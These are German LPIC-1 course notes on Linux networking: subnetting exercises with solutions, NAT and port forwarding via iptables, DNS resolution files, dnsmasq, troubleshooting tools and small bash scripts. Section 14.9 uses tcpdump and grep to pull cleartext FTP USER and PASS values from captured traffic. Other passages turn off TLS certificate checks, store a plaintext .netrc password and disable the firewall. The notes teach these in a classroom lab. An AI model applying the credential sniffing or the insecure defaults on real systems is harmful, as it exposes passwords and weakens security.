  • E-Mail-Kommunikation: 25 (SMTP), 110 (POP3), 143 (IMAP)

  • WWW: 80 (HTTP), 443 (HTTPS) [Standard-Transportprotokoll ist dabei TCP]

  • DNS-Namensauflösung: 53 (Domain) [Standard-Transportprotokoll ist dabei UDP]

  • Network Time Protocol 123 (NTP) [Standard-Transportprotokoll ist dabei UDP]

Daneben gibt es noch eine Datei, die die Protokollnummern definiert: /etc/protocols, z.B. ein Eintrag für das Internet Protocol lautet: "ipv4 4 IPv4"

14.3. IP-Adressierung und Routing

Filmempfehlung "Warriors of the Net" (Youtube, dt. Übersetzung)

IP-Protokollversionen:

  • IPv4: Adresslänge = 32 bit

  • IPv6: Adresslänge = 128 bit

Das Adressierungsschema von IPv4:

  • Max. Adressenzahl ein unaufgeteilten einzigen Netzwerk: 2^32 ~ 4 Mrd Hosts

  • Unterteilung schafft Unternetze, Adressklassen:

    • Class A: 2²⁴ = 16777216 - 2 = 16777214 adressierbare Hosts pro Netzwerk
      (2⁷ = 128 - 2 [Ausnahmsweise nur bei Class A: "- 2" !!] = 126 Netzwerke)

14.3.1. Hilfstabelle für Umrechnung Dezimal / Dual

Achtung: Die Dezimal-Skala ist um -1 verschoben, da ungerade Zahlen nur im Zusammenhang mit 2⁰ = 1 machbar sind!

Am Schluss das Ganze Kummulieren ⇒ ⇒ ⇒ ⇒ ⇒

128

192

224

240

248

252

254

255

128

64

32

16

8

4

2

1

2⁷

2⁶

2⁵

2⁴

2⁰

⇐ ⇐ ⇐ ⇐ ⇐ Stellenwert wird in dieser Richtung größer.

14.4. Fragen/Aufgaben zur Wiederholung und Vertiefung

  1. Studieren Sie die Tabellen auf http://www.elektronik-kompendium.de/sites/net/0811271.htm bezüglich der 5 Adressklassen und der 3 privaten Bereiche in Class A-, B- und C-Netzwerken.

Weitere gute Adressen:

Der Gesamtinhalt des Skriptes:

#!/bin/bash
#
# ftpmirror

host="lpic1.example.test"

download(){
  lftp -e 'mirror --verbose /HandOuts/PemmannAxel/LPI-102 /home/tux/LPI-102; by' $host
}

upload(){
  lftp -e 'mirror --verbose --reverse /home/tux/Upload /HandOuts/Kursteilnehmer/pemmann; by' $host
}

upload-delete(){
  lftp -e 'mirror --verbose --reverse --delete /home/tux/Upload /HandOuts/Kursteilnehmer/pemmann; by' $host
}

ping -c 1 $host > /dev/null 2>&1
if [ $? -ne 0 ]
        then
            echo "NETZWERKFEHLER: Host $host nicht erreichbar."
        else
          case "$1" in
            down)
                        download ;;
            up)
                        upload ;;
            up-delete)
                        upload-delete ;;
            *)
                echo "Aufruf: $0 {down|up|up-delete}" ;;
          esac
fi

14.5. NAT unter Debian einrichten

Voraussetzung:

  • Netzwerkkarte 1 (eth0): <IP-Adresse im LAN> (per DHCP via Bridge)

  • Netzwerkkarte 2 (eth1): 172.16.0.1 (statisch gesetzt, im internen Netz "intnet")

Aktivieren von IP-Forwarding (Datenpakete zwischen den NICs weiterleiten)

  • Temporär zur Laufzeit:

    a) echo 1 > /proc/sys/net/ipv4/ip_forward
    b) sysctl -w net.ipv4.ip_forward=1
  • Dauerhaft machen:

    vi /etc/sysctl.conf
    net.ipv4.ip_forward=1     ## Zeile 28 aktivieren

Akivieren von Network Address Transaltion:

  • Zur Laufzeit (Wichtig ist hierbei die Angabe des Outgoing-Interfaces mit -o, oft ppp0, hier: eth0)

    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    -> Im einfachsten Fall dauerhaft machen, indem man diese Zeile in die Datei
    /etc/rc.local
    VOR dem 'exit 0' schreibt.
  • Kontrolle:

    iptables -t nat -vnL

Konfiguration/Testings auf CentOS:

  • Ping zu 172.16.0.1 (= Standard-Gateway)

  • STD-GW setzen: route add default gw 172.16.0.1

  • STD-GW fest eintragen: vi /etc/sysconfig/networkGATEWAY=172.16.0.1

  • Ping zu 8.8.8.8, und zu ix.de (wenn letzteres nicht funktioniert, die /etc/resolv.conf bearbeiten: nameserver 194.25.2.129)

  • IP-Adressen wurden bereits konfiguriert:

    /etc/sysconfig/network-scripts/ifcfg-eth0
    /etc/sysconfig/network-scripts/ifcfg-eth1
  • Netzwerk neu starten:

    /etc/init.d/network stop
    /etc/init.d/network start
  • Secure Shell Zugang aktivieren und nutzen

    • Wird der sshd automatisch gestartet?

      • Bis Cent0S 6.5: chkconfig

      • Ab CentOS 7.0:

        systemctl -a | grep ssh
        Alternativ:  systemctl --state=active --type=service | grep ssh
    • Firewall vorerst deaktivieren:

      • Bis Cent0S 6.5:

        service firewalld stop
        service --status-all     (zur Kontrolle)
        chkconfig firewalld off
      • Ab CentOS 7.0:

        [service firewalld stop]
        systemctl stop firewalld
        systemctl disable firewalld
      • Kontrolle:

        iptables -vnL [-t nat]
    • SSH benutzen

  • Weitere Software installieren

    yum install nmap lynx gpm
    service gpm start  (Maus-Unterstützung für die virtuelle Konsole starten)

14.6. Weitere Aufgaben zur Wiederholung

  1. Installieren Sie auf Debian den FTP-Client lftp, erstellen Sie danach eine Konfigurationsdatei in Ihrem normalen Benutzeraccount:

    /bin/su -
    apt-get update
    apt-get install lftp
    exit
    mkdir ~/lftp
    echo 'set ssl:verify-certificate no' > ~/.lftp/rc
    echo 'set ftp:ssl-allow no'  >> ~/.lftp/rc

Prüfen Sie den Inhalt der Datei ~/.netrc, sie beinhaltet die automatisch übergebenen Logindaten für den FTP-Server unseres Kurses.

Legen Sie ein Verzeichnis für die zu spiegelnden Daten an:

mkdir ~/LPI-102

Testen Sie, ob Sie mit der folgenden Zeile alle Dokumente aus dem entfernten FTP-Verzeichnis /HandOuts/PemmannAxel/LPI-102 in Ihr lokales Verzeichnis /home/tux/LPI-102 herunterladen können. Setzen Sie dabei anstelle von "tux" Ihren Benutzernamen ein.

lftp -e 'mirror --verbose /HandOuts/PemmannAxel/LPI-102 /home/tux/LPI-102; by' lpic1.example.test

Schreiben Sie abschließend diese Zeile in ein Shellskript, das Sie später komfortabel ausführen können. Dokumentieren Sie darin die Namen und den Inhalt der beiden Konfigrationsdateien.

Inhalt der Datei ~/.netrc

machine lpic1.example.test
login myUsername
password myPassword

14.7. Internet Protocol version 6

Die Adresslänge wurde von 32 bit auf 128 erhöht. Der Grund: Adressknappheit (vor allem in Asien).

In der Regel wird Hexadezimlschreibweise verwendet, Doppelpunkte unterteilen 8 Abschnitte zu je 16 bit.

Weitere Eigenschaften:

  • DHCP kann nativ mittels built-in Funktionen genutzt werden (Solicitations und Advertisements) oder mit einem separaten DHCPv6-Server

  • Broadcasts wurden abgelöst, anstelle dessen werden Multicasts verwendet ("ein Hallo an alle Router" oder ein "Bitte konfiguriere mich" an alle Hosts)

  • Unterschiedlich große Bereiche von Unicast-Adressen:

    • Link-Local (nur auf eine bestimmte Schnittstelle gültig) → Option: -I <IF>

      Beispiel: ping6 -I eth0 fe80::70ce:3d8:d8ad:27b9

    • Unique-Local (nur im physischen Netzsegment gültig), keine Routerfindung, Beispieladresse: fc00::/7

    • Globale-Unicast (Weltweite Nutzung), Beispieladresse: 2a02:2e0:3fe:1001:302:: zur Domain six.heise.de

      Beispiel zum mitmachen (Debian): ip addr add 1234::1/64 dev eth0
      ping6 -c2 1234::2
      Beispiel zum mitmachen (CentOS): ip addr add 1234::2/64 dev eth1ping6 -c2 1234::1

  • Header: Kleiner, schlanker und flexibler als bei IPv4 (→ schnellere Netze), fester, kleinerer MTU-Wert: 1280 Byte

  • Mobilität bei wechselnden IP-Adressen in verschiedensten Intranets: nach wie vor umständlich via Home-Agent

  • Unterstützung von IPsec (= geplante Standard-VPN-Lösung) ist da, muss aber genauso manuell implementiert werden wie bei IPv4

  • Dual-Stack-Betrieb (IPv4 gleichzeitig mit IPv6): Das neue IPv6 hat Vorrang, d.h. zuerst wird versucht, den angfragten Host per IPv6 aufzulösen, nach kurzem Timeout dann per IPv4

Aus Performance und Sicherheitsgründen kann es u.U. besser sein IPv6 zu deaktivieren, siehe https://www.thomas-krenn.com/de/wiki/IPv6_deaktivieren

14.8. Erweiterung Netzwerk

Ziel: Der Debian-Router soll eingehende Anfragen an Port 222 an den im isolierten Netz laufenden CentOS-Rechner zu seinem Standard-Port 22 weiterleiten (Port-Forwarding).

Wichtige Informationen in Voraussetzung:

  • Wie lautet die eingehende Schnittstelle von Debian (putty.exe → LAN-Bridge → eth0)

  • Wie lautet die IP-Adresse auf eben dieser Schnittstelle? (→ 10.23.18.109)

  • Zu welcher IP-Adresse soll weitergeleitet werden? (CentOS → 172.16.0.2)

  • Wie lauten die zu mappenden Portnummern? (222 → 22)

Die Kommandozeile lautet in diesem Fall:

iptables -t nat -A PREROUTING -i eth0 -d 10.23.18.109 -p tcp --dport 222 -j DNAT   --to-destination 172.16.0.2:22

Dauerhaft machen der Einstellung: Datei /etc/rc.local ergänzen.

14.9. Paketanalyse mit tcpdump

Beipiele:

  • tcpdump -i eth0

  • tcpdump -i eth0 host 10.23.10.100

  • tcpdump -i eth0 host 10.23.10.100 and not port 22

  • tcpdump -i eth0 host 10.23.10.100 and not port 22 -A

  • tcpdump -i eth0 host lpic1.example.test -w ftp.dump

    • grep -a USER ftp.dump (→ f009cec1)

    • grep -a PASS ftp.dump (→ pFLN…)

  • tcpdump -i eth0 host \(10.23.10.100 or 10.23.18.1 \)

14.10. Fragen/Aufgaben zur Wiederholung und Vertiefung

  1. Ein Netzwerk beschreibt sich mit 192.168.4.0 und der Netzmaske 255.255.255.0. Es sollen durch Subnetting mindestens 5 Rechner in jedem der zu bildenden separaten Teilnetzen aufgestellt werden können, diese Anzahl soll aber nicht mehr als nötig erhöht werden. Wie lautet die neue Netzwerkmaske in CIDR- und Dezimalschreibweise?

    -->  Es müssen 3 Host-Bits auf 0 bleiben,
            also: 2^3 -2 = 6 verwendbare  Adressen

Maskenberechnung:

11111111.11111111.11111111.00000000
Move /24  to /29
11111111.11111111.11111111.11111000

Umrechnug in dezimale Schreibweise:

11111  =  2^7 + 2^6 + 2^5 + 2^4 + 2^3 = 248
  1. Ein Host hat die Adresse 192.168.55.64/24. Es sollen 4 Unternetze geschaffen werden. Kann er die Adresse nach dem Einrichten weiter verwenden? Wie heißt die neue Subnetmaske?

    2 ^ 2 = 4 Subnetze

-→ 2 Bits von der Host-ID geborgt

also 2^7 + 2^6 = 128 + 64 =192

Die neue Maske lautet: /26 oder 255.255.255.192

Die einzelnen Subnetzbereiche:

Netz: 0 bis 63
Netz: 64 bis 127       <=== Rechner befindet sich nun in II. Subnet
Netz: 128 bis 191
Netz: 192 bis 255

Diese Adresse kann nicht mehr verwendet werden, da es sich um die Netzwerk-ID (Alle Host-Bits auf 0 gesetzt) im 2. Unternetz handelt.

  1. In einem großen Netzwerk befindet sich ein Rechner, der mit der IP-Adresse 10.0.0.200 und der Netzwerkmaske 255.0.0.0 konfiguriert wurde.

Um Probleme mit zu hohem Broadcast-Verkehr in den Griff zu bekommen, beabsichtigt man nun das Netzwerk, in dem auch dieser Computer steht, mittels Subnetting in kleinere, handlichere Teilnetze zu untergliedern. Die Bedingung ist aber, dass nach Umstellung der Netzwerkmaskeneinstellungen, die auf allen beteiligten Maschinen durchgeführt werden muss, noch ca. 100 Maschinen pro Subnetz betrieben werden können.

a) Wie lautet die neue Netzmaske?

Zu a) Wir borgen uns 17 Bits vom Host-Anteil, wobei 7 Bits für die Hosts übrig bleiben müssen:

Maske vorher:    11111111.00000000.00000000.00000000
Maske nachher:   11111111.11111111.11111111.10000000
(2 ^ 7 = 128 - 2 = 126 Hosts pro Subnetz)
Die neue Netzwerkmaske lautet /25 oder 255.255.255.128.

b) In welchem Teilnetz befindet sich danach dieser Rechner?

Der  Rechner mit der IP-Adresse 10.0.0.200 und der neuen  Netzwerkmaske 255.255.255.128 befindet sich im 2. Subnetz.

c) Wie viele Teilnetze gibt es nach Anpassung der Netzwerkmaskeneinstellungen?

Die 17 geborgten Bits stellen die Subnetz-ID dar, aus der die Anzahl der Unternetze berechnet werden kann:
2 ^ 17 = 131072 Unternetze.
  1. In einer Firma gibt es das Netzwerk 192.168.0.0/24. Es soll durch Unternetzbildung besser an die innerbetrieblichen Strukturen (kleine Arbeitsgruppen) angepasst werden. Es muss allerdings sichergestellt sein, dass mindestens 12 Rechner in jedem dieser Unternetze aufgestellt werden können.

    a) Wie lautet die neue Subnetmask in CIDR- und Dezimalschreibweise?
    b) Wie viele Unternetze gibt es?
    c) Wie lautet die Adresse des 4. Hosts im 3. Unternetz?

14.11. Aufgabe Bash Scripting

Modifizieren Sie das aktuelle Skript ftpmirror so, dass Sie ihm als weiteren Übergabeparameter einen Verzeichnisnamen mitgeben können, der anstelle des fest eingetragenen Zielordners /home/USER/LPI-102 benutzt werden soll.

Können in dem Zusammenhang die Simple-Ticks bei den lftp-Befehlen beibehalten werden (Variablenexpansion)?

Da in der Funktion die Postitionsparametervariable "$2" nicht direkt genutzt werden kann, wird eine Hilfsvariable zielpfad erzeugt, in die der aktuelle Übergabewert gespeichert wird:

zielpfad="$2"

download(){
  lftp -e "mirror --verbose /HandOuts/PemmannAxel/LPI-102 $zielpfad; by" $host
}

Die komplette Umsetzung ist in Datei ftpmirror-0.6 zu finden.

15. Topic 109.2: Basic network configuration

ZIEL: Konfiguration von Clients, Reihenfolge der Namensauflösung

15.1. Host- und Netzwerknamen ausgeben und ändern

Informationen generieren:

  • hostname [--fqdn|-f]

  • domainname [-d] [-f] [-I]

  • uname [-a] [-n]

Hostnamen ändern:

Bei den meisten Distributionen müssen nur zwei Dateien bearbeitet werden:

  • /etc/hostname (manchmal: /etc/HOSTNAME) → Definition des Hostnamens (Debian: Ohne Domainname)

  • /etc/hosts (meist wird der FQDN der Adresse 127.0.1.1 zugeordnet)

Zusätzlich kann auch einer Netzwerk-ID wie 172.16.0.0 ein Name zugeordnet werden:

  • /etc/networks

    intnet 172.16.0.0
    intnet2 192.168.99.0

15.2. Reihenfolge der Namensauflösung

Die Konfiguration wird in zwei Dateien vorgenommen:

a) Bis libc5: /etc/host.conf

multi on
order: hosts, bind

b) Ab libc6: /etc/nsswitch.conf

hosts: files dns

Der Ablauf beim Erfragen von IP-Adressen beginnt i.d.R. in der lokalen Datei /etc/hosts, wenn diese Datei keine Antwort geben kann, wird über den in der /etc/resolv.conf festgelegten Nameserver ein DNS-Query angestoßen.

Die Angabe der zu verwendenden Nameserver und weitere Dinge wie den anzuhängenden Domainnamen oder die Suchreihenfolge in mehreren DNS-Suffixen geschieht hier:

  • /etc/resolv.conf

    nameserver 127.0.0.1
    nameserver 194.25.2.129
    nameserver 8.8.8.8
    domain test.site
    ## Alternativ zu "domain":
    search de at ch
    ("domain" und "search" können nicht parallel verwendet werden)

15.3. Schnittellen Live-Konfiguration

Kommandos zum direkten Bearbeiten OHNE Benutzung von Konfigdateien:

  • ifconfig

  • route

Beispiele zu ifconfig

  • Alle Schnittstellen zeigen, auch deaktiviere: ifconfig -a

  • Schnittstelle deaktivieren: ifconfig eth1 down

  • Bei ifconfig taucht sie nun nicht mehr auf, daher ifconfig -a verwenden!

  • Schnittstelle wieder aktivieren: ifconfig eth1 up

  • Schnittstelle wieder deaktivieren: ifconfig eth1 down

  • Eine andere Adresse setzen:
    ifconfig eth1 209.14.5.88/26 [up]
    Dabei wird die Schnittstelle automatisch aktiviert, das Wörtchen up kann weggelassen werden.

  • IP-Alias setzen (eine Art Unterschnittstelle mit separatem Namen):

    ifconfig eth0:0 10.22.33.44/24
    ifconfig eth0:0
    => Einsatzmöglichkeit: IP-basierte virtuelle Hosts (Webserver Apache)

Beispiele zu route

  • Standgateway setzen: route add default gw 10.22.33.1

  • Standardgateway löschen: route del default

  • Route ins LAN setzen (auf CentOS in Richtung Win7-Host):

    route add -net 10.23.18.0 netmask 255.255.255.0 gw 172.16.0.1

Praktische Umsetzung (Tipp: Standardgateways für mehr Durchblick löschen):

  • Auf CentOS: route del default

  • Auf CentOS: route add -net 10.23.18.0 netmask 255.255.255.0 gw 172.16.0.1

  • Auf dem Debian-Router: iptables -t nat -F (Debian ist nur noch ein reiner Router, NAT ist deaktiviert)

    Auch hier kann das Standardgateway entfernt werden: route del default

    HINWEIS: Nach wie vor wichtig: cat /proc/sys/net/ipv4/ip_forward # → 1

  • Auf dem Windows-Hostsystem: route add 172.16.0.0 mask 255.255.255.252 10.23.18.109

  • Testings von beiden Seiten aus sollte jetzt gehen:

    • Von CentOS aus: ping -c3 10.23.18.100

    • Von Windows aus: ping -n 3 172.16.0.2

Siehe auch Snapshot "routing-übung-(transparent).png"

15.4. Schnittellen Non-Live Konfiguration

Hatten wir eben ohne Rücksicht auf Konfigdateien Schnittstellen bearbeitet, lesen die beiden folgenden Kommandos dagegen die jeweiligen Dateien (z.B. /etc/network/interface) aus:

  • Deaktivierung einer Schnittstelle (z.B. auf DHCP-Lease angeben): ifdown eth1

  • Aktivierung einer Schnittstelle: ifup eth1

15.5. Fragen/Aufgaben zur Wiederholung und Vertiefung

  1. Ihr Chef kommt zu Ihnen mit einem IP-Adressbereich für Ihre neue Tochter Firma Brot AG: 182.73.x.x , er möchte das Sie für folgende Gegebenheiten das Subnetting durchführen. Es werden 42 getrennte Netzte benötigt, in denen zwischen 4 und 600 Rechner genutzt werden können. Wie lautet die dafür erforderliche Netzwerkmaske? (Nach http://www.2was.de/nw/subnetting.pdf)

Die Adresse stammt aus einem Class B-Netz

        Maske: 11111111.11111111.00000000.00000000

        Fragestellung:
        Wieviele Bits müssen für 42 Unternetze geborgt werden?

        2^x = 42 Subnetze
        x = 6 Bits müssen mindestens geborgt werden

        Maske: 11111111.11111111.11111100.00000000

        Fragestellung:
        Reichen die 10 verbleibenden Host-Bits aus?

        2 ^ 10 = 1024 -2 = 1022

        Ja, diese Hostanzahl ist ausreichend.

        Die Maske /22 (Dez: 255.255.252.0) kann dementsprechend verwendet werden
  1. Sie übernehmen die Stelle eines in Rente gegangenen Administrators und sind dabei, den Serverbestand zu dokumentieren und die Konfiguration zu optimieren.
    Es gibt drei Hauptserver, die mit der selben Subnetzmaske 255.255.255.224 konfiguriert sind, aber in unterschiedlichen Subnetzen stehen.
    Sie überlegen nun, sie gemeinsam in dem Netzwerk 192.168.0.0/255.255.255.224 unterzubringen.
    Könnten sich dann die drei Server in diesem Netzwerk untereinander erreichen, wenn die IP-Konfiguration der drei Server unverändert übernommen werden soll?

    Die drei Server haben folgende Adressen:

  Broadcast   .31      000 11111
  Netzwerk    .32      001 00000

  .. 192.168.0.33      001 00001
  .. 192.168.0.66      010 00010
  .. 192.168.0.99      011 00011

  Maske für /27 ->   111 00000

        Umrechnung Dezimal -> CIDR: Im IV. Oktett die Zahl 224 zerlegen:

                128 + 64 + 32 = 224, also sind drei Bits geborgt worden -> /27

    Fragestellung: Wo liegen die Grenzen der Unternetze?
    Dazu ist wichtig zu wissen -> Anzahl der Adressen pro Subnet -> 2 ^ 5 = 32


        1. Teilnetz: 192.168.0.0 - 192.168.0.31
        2. Teilnetz: 192.168.0.32 - 192.168.0.63
        3. Teilnetz: 192.168.0.64 - 192.168.0.95
        4. Teilnetz: 192.168.0.96 - 192.168.0.127
        5. Teilnetz: ...

⇒ Nein, sie sind NICHT im selben Netzwerk!

  1. Worin unterscheiden sich die Kommandos ifconfig und ifup (bzw ifdown)?

    • Im Gegensatz zu ifconfig schalten die anderen beiden gemäß Konfigurations-Dateien die NICs ein und aus.

  2. Wie lauten die 5 wichtigen Dateinamen, die die Reihenfolge der Namensauflösung konfigurieren und letztendlich zur Ermittung einer IP-Adresse für einen angefragten Hostnamen führen? Lassen Sie sich deren Dateiinhalt jeweils zur Kontrolle ausgeben.

    • /etc/host.conf (Reihenfolge, alt)

    • /etc/nsswitch.conf (Reihenfolge, neu → Name Service Switch)

    • /etc/networks (Netzwerknamen statisch zuordnen)

    • /etc/hosts (Hostnamen statisch zuordnen)

    • /etc/resolv.conf (Angabe von Nameserver und Domainnamen/-Suffixen)

Weitere Dateien im Zusammenhang mit Hostnamen und Namens-Auflösung

/etc/hostname       (Definiert den Hostnamen)
/etc/services       (Auflösung von Dienstenamen zu Port-Nummern)
/etc/protocols      (Auflösung von Protokollnamen zu Protokoll-Nummern)
  1. Modifizieren Sie die letzte Version des Skriptes ftpmirror dahingehend, dass es beim Downloaden überprüft, ob der Benutzer tatsächlich zwei Positionsparameter angegeben hat. Geben Sie ansonsten eine Hilfestellung aus.

Hilfestellung: Die Variable, die die Anzahl der Positionsparameter speichert: $#

Codeschnipsel für Standalone-Test:
if [ $# -eq 2 ]
        then echo "Alles OK, das waren $# Paramter."

        else echo "PROBLEM: Es sind keine oder nicht die richtige Anzahl an Positionsparametern angegeben worden!"
fi
Codeschnipsel für das Skript, in den "down)"-Case-Zweig einzubauen:
if [ $# -eq 2 ]
       then download
       else echo "Bitte als zweiten Parameter das Zielverzeichnis angeben."
fi

16. Topic 109.3: Basic network troubleshooting

Typischerweise nutzt der Admin eine Reihe von Werkzeugen:

  • ping (mit "-p" können Klartext-Pattern gesendet werden: ping -p deadbeaf host)

  • traceroute/tracepath

  • netstat (Optionen: -i / -r / -tulpen, -M oder --masquerade, Broadcast-Services werden nicht unterstützt)

  • lsof (Optionen: -iTCP -P)

  • nmap (Optionen: -p 22,23,135-139,445,9100 / -P0 / -A -T4), Ziele können auch Netzwerke sein: 10.0.0.0/24

  • netcat als Portscanner: nc -zv 172.16.0.2 20-25

  • Namensauflösung:

    • nslookup

    • host (MX-Record abfragen: host -t mx gmx.de)

    • dig, ein paar wichtige Optionen:

      • Einen anderen Nameserver angeben: @8.8.8.8

      • Einen Record-Typ angeben, z.B.: -t mx oder -t MX, oder einfach nur mx oder MX (z.B. dig lpi.org MX)

      • Ausgabe in reduzierter Kurzform: +short

  • ARP-Protokoll: arp -an / ip neigh flush all

16.1. Erweiterung der Übungsumgebung

Aufgabe 1:

Verändern Sie die Subnetgröße im isolierten intnet, so dass mindestens (aber auch nicht mehr als nötig) 20 Hosts adressierbar sind.

=> Anzahl der Hosts?  2^x=20 ???

 2 ^ 4 = 16 - 2 = 14   (= zu wenig!)

 2 ^ 5 = 32 - 2 = 30   (= OK)

 00000000  => 00011111     /24  =>  /27

 Dez.: 255.255.255.224

a) Nach dem Bearbeiten der Datei sieht die Konfiguration auf Debian so aus:

        grep -B2  255.255.255.224 /etc/network/interfaces
                iface eth1 inet static
                address 172.16.0.1
                netmask 255.255.255.224

        ### Nicht vergessen:  `service networking restart`

b) Nach dem Bearbeiten der Datei sieht die Konfiguration auf CentOS 7 so aus:

        cat /etc/sysconfig/network-scripts/ifcfg-nic0
                BOOTPROTO="none"
                ONBOOT="yes"
                IPADDR="172.16.0.2"
                PREFIX="27"
                # Für sicheres 2-Teilnehmer-Netz:
                #PREFIX="30"
                DEVICE="enp0s3"

        ### Nicht vergessen:  `service network restart`

Aufgabe 2:

Installieren Sie auf dem Debian-Router das Paket "dnsmasq" und machen Sie sich auf https://wiki.debianforum.de/WLAN-Access-Point_mit_hostapd_und_USB-Stick schlau, wie dieser kleine DHCP/DNS-Server z.B. für den Raspberry Pi eingerichtet werden könnte.

  • Installation: apt-get update && apt-get -y install dnsmasq

  • Was ist das? whatis dnsmasq
    dnsmasq (8) - A lightweight DHCP and caching DNS server.

  • Welche Configs gibt es? dpkg -L dnsmasq → /etc/dnsmasq.conf

  • Welche man-Pages gibt es dazu? apropos dnsmasq → nur dnsmasq

Aufgabe 3:

Konfiguren Sie den DNSMASQ-Server passend für Ihr Netzwerk; es sollen anfragenden DHCP-Clients Adressen im Bereich von 172.16.0.20 bis 172.16.0.30 zugewiesen werden.

        mv /etc/dnsmasq.conf /etc/dnsmasq.conf.orig

        echo 'interface=eth1' > /etc/dnsmasq.conf
        echo 'no-dhcp-interface=eth0' >> /etc/dnsmasq.conf
        echo 'dhcp-range=interface:eth1,172.16.0.20,172.16.0.30,infinite' >> /etc/dnsmasq.conf

Wie läuft die DNS-Namensauflösung jetzt ab?

        Ausgangspunkt: `grep dns  /etc/network/interfaces`
                                        dns-nameservers  8.8.8.8

⇒ Aus diesem Eintrag wird normalerweise dank des Paketes resolvconf der Nameserver in die Datei /etc/resolv.conf geschrieben. Läuft aber der DNSMASQ-Daemon, verlagert er diese Information temporär in die /var/run/dnsmasq/resolv.conf und trägt "127.0.0.1" als Nameserver in die resolv.conf ein.

Diesbezüglich kann auch die folgende Zeile sehr aufschlussreich sein: ps aux | grep dnsmasq

Nach der Änderung in der Konfiguration bitte den Service neu starten:

service dnsmasq restart

Nun den Logmonitor starten: tail -f /var/log/syslog

Jetzt kann versucht werden, die Mikro-Linux-Distribution SliTaz (Sie muss keine Festplatte erhalten) im Netzwerk intnet automatisch per DHCP konfigurieren zu lassen.

Informationen aus der /var/log/syslog
Feb  5 13:37:35 deb7 dnsmasq-dhcp[7107]: DHCPDISCOVER(eth1) 08:00:27:b7:77:fd
Feb  5 13:37:35 deb7 dnsmasq-dhcp[7107]: DHCPOFFER(eth1) 172.16.0.24 08:00:27:b7:77:fd
Feb  5 13:37:35 deb7 dnsmasq-dhcp[7107]: DHCPREQUEST(eth1) 172.16.0.24 08:00:27:b7:77:fd
Feb  5 13:37:35 deb7 dnsmasq-dhcp[7107]: DHCPACK(eth1) 172.16.0.24 08:00:27:b7:77:fd

⇒ Bitte auch gern Windows 2003 mit ins Netz nehmen…

16.2. Fragen/Aufgaben zur Wiederholung

  1. Gegeben sei eine Netzwerk-ID von 10.0.0.0/8. Wie viele Bits müssen Sie sich vom Hostanteil borgen, wenn Sie viele, sehr kleine Unternetze schaffen sollen, die aber jeweils mindestens 3 Hosts beinhalten müssen. Wie heißt die neue Netzwerkmaske in CIDR und dezimaler Schreibweise?

    Ausgangspunkt: 11111111.00000000.000000000.0000000
    Zielpunkt:     11111111.11111111.11111111.11111000
    => 3 Bit bleiben auf 0, um 6 Hosts adressieren zu können (2 ^ 3 = 8 - 2 = 6)
    Geborgt werden müssen 21 Bits (2 ^ 21 = 2097152 Unternetze), die Subnetzmaske lautet nun /29
    oder 255.255.255.248.
  2. Mit welchen drei Werkzeugen können Sie DNS-Eintrage von Nameservern erfragen?

    • host

    • nslookup

    • dig

  3. Erkunden Sie, welche TCP- und UDP-Ports Ihr Debian-Router geöffnet hat. Verwenden Sie dabei lokal arbeitende Kommandos und spezielle Werkzeuge, die Sie auch remote (von CentOS aus) einsetzen können (vier Tools).

    • netstat -tulpen

    • lsof -i -P

    • nc -zv 172.16.0.1 20-2000

    • nmap 172.16.0.1

  4. Mit welchen zwei für die LPI-Prüfung relevanten Kommandos können Sie sich Ihre Routingtabelle ausgeben?

    • route [-n]

    • netstat -r [-n]

  5. Lassen Sie sich mittels zwei für die LPI-Prüfung relevanten Kommandos Interface-Statistiken ausgeben.

    • ifconfig

    • netstat -i

  6. Schreiben Sie ein Skript fw-simple, das grundlegende Regeln für eine einfache Firewall beinhalten soll. Definieren Sie im Header des Skriptes die weiter unten stehenden Funktionen open und close (Siehe Datei lpic1-vorbereitung-2015-01-14.txt). Rufen Sie diese Funktionen aus einer case-Verzeigung heraus auf: der erste Zweig soll mit dem Übergabeparameter stop die Funktion open ausführen, der zweite Zweig soll mittels dem Übergabeparameter start die Funktion close abarbeiten.

Siehe auch Datei "lpic1-vorbereitung-2015-01-14.txt"
open(){
        iptables  -P  INPUT ACCEPT
        iptables  -P  OUTPUT ACCEPT
        iptables  -P  FORWARD ACCEPT
        iptables  -F
        iptables  -X
        iptables  -Z
}

close(){
        iptables  -P  INPUT DROP
        iptables  -P  OUTPUT DROP
        iptables  -P  FORWARD DROP
        iptables  -F
        iptables  -X
        iptables  -Z
}

case "$1" in

  start)
          close
          echo "Firewall wurde aktiviert."
          ;;
  stop)
          open
          echo "Firewall wurde deaktiviert, KEINE Sicherheit mehr vorhanden!"
          ;;
  *)
          echo "Aufruf: $0 {start|stop}"
          ;;
esac

17. Topic 109.4: Clientseitiges DNS konfigurieren

Als Wiederholung und Vertiefung (Handlungsrahmen):

  • Tragen Sie in Ihre /etc/hosts einen bekannten Webserver (z.B. http://blindekuh.de) mit der IP-Adresse 1.2.3.4 ein.

    echo "1.2.3.4   blindekuh.de"  >> /etc/hosts
  • Übungshalber setzen und entfernen der Proxy-Variable "http_proxy"

    export  http_proxy="http://172.16.0.1:3128"
    unset  http_proxy
  • Testen Sie mit "w3m", ob Sie noch diese Suchmaschine aufrufen können. (Sie können auch gern "lynx" installieren und dafür benutzen) → Ansonsten bitte auch gern mit dem Kommando "ping" testen!

    ping -c3  blindekuh.de
    PING blindekuh.de (1.2.3.4) 56(84) bytes of data.
    ...
    Nach eine Weile bricht der ping wegen Timeout ab!
  • Verbiegen Sie die Reihenfolge der Namensauflösung: Zuerst soll der Nameserver kontaktiert werden, danach erst die /etc/hosts:

    vi /etc/nsswitch.conf
    hosts:          dns files
    Je nach Distribution evl. erforderlich:    `service nscd restart`
  • Testen Sie, ob Sie jetzt wieder z.B. http://blindekuh.de erreichen können

    ping -c3  blindekuh.de
    => Es funktioniert wieder, da jetzt ZUERST die '/etc/resolv.conf' ausgewertet wird, danach erst
       die Datei '/etc/hosts'.
  • Setzen Sie abschließend die Einstellungen in beiden Dateien zurück, testen Sie es aus.

    vi /etc/nssswitch.conf
    hosts:          files dns
    Sofern vorhanden: `service nscd restart`
    sed -i '/blindekuh/d' /etc/hosts
    ping -c3  blindekuh.de
  • Aufgabe: Lösen Sie typische Tracker-URls in der /etc/hosts gegen 127.0.0.1 auf, z.B.:

    • de.ioam.de

    • qs.ivwbox.de

      Siehe auch: https://www.sit.fraunhofer.de/de/tpl/

17.1. Fragen/Aufgaben zur Wiederholung

  1. Erzeugen Sie einen ersten IP-Alias auf Ihrer 1. Ethernet-Schnittstelle mit der Adresse 172.16.5.10/24.

    • ifconfig eth0:0 172.16.5.10/24

